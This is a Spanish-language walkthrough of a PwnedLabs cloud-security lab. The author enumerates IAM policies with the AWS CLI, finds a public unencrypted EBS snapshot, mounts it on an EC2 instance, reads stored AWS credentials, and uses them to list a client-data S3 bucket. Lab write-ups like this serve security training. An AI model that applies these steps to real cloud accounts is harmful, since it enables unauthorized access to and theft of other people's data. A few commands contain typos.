PwnedLabs Loot public ebs snapshot
Linux
Lo primero que hacemos es configurar nuestra cuenta
aws configure --profile pwnedlabs
aws sts get-caller-identity --profile pwnedlabs
La ultima foto nos dice que estamos en el aws iam con el usuario llamado intern.
Despues trato de ver si puedo listar los objetos en el bucket. Pero parece que no tengo acceso.
aws s3 ls --profile pwnedlabs
aws iam list-attached-user-policies --user-name intern
aws iam get-policy --policy-arn arn:aws:iam::104506445608:policy/PublicSnapper --profile pwnedlabs
aws iam get-policy-version --policy-arn arn:aws:iam::104506445608:policy/PublicSnapper --profile pwnedlabs --version-id v9
aws ec2 describe-snapshots --owner-ids 104506445608 --region us-east-1 --profile pwnedlabs
aws ec2 describe-snapshots --owner-ids 104506445608 --region us-east-1 -profile pwnedlabs | grep -i SnapshotId | head -1 | xclip -sel clip
aws ec2 describe-snapshot-attribute --attribute createVolumePermission --region us-east-1 ---snapshot-id snap-0c0679098c7a4e636
Vemos quien tiene permisos para crear volumenes y tambien antes que la opcion de Encrypted : false.
Ahora vemos que se despliega Group:all que significa que el snapshot es publico y cualquier usuario puede crear un volume de ese snapshot en su cuenta de AWS.
Le damos click a EC2
Le damos click a snapshots
Seleccionamos Public snapshots y buscamos Snapshot ID = snap-0c0679098c7a4e636
Podemos ver que se tiene acceso por ser una imagen publica y tambien que no esta encriptada.
Le damos click a Actions -> Create volume from snapshot
Le damos click a Create volume.
Nos dirigimos a volumes
Nos aseguramos que el Volume este disponible
Le damos click a Launch Instance
Le damos un nombre y todo el resto debe ser por defecto
Escogemos seguir sin un key pair
Y en la subnet escogemos una que esta en el Availability Zone: us-east-1a
Le damos click a Launch Instance
Vamos al menu y escogemos Volumes y despues le damos click a attach volume
Le damos click en attached volumes
Escogemos Ebspwned y le damos click a connect
lsblk
mkdir mnt
sudo su
mount -t ext4 /dev/xvdf1 mnt
cd mnt
ls -ahl
cd home
ls -ahl
cd practice_files
ls -ahl
cat s3_download_file.php
cat s3_download_file.php
batcat creds
aws configure --profile pwnedlabs
aws sts get-caller-identity --profile pwnlabs
aws s3 ls ecorp-client-data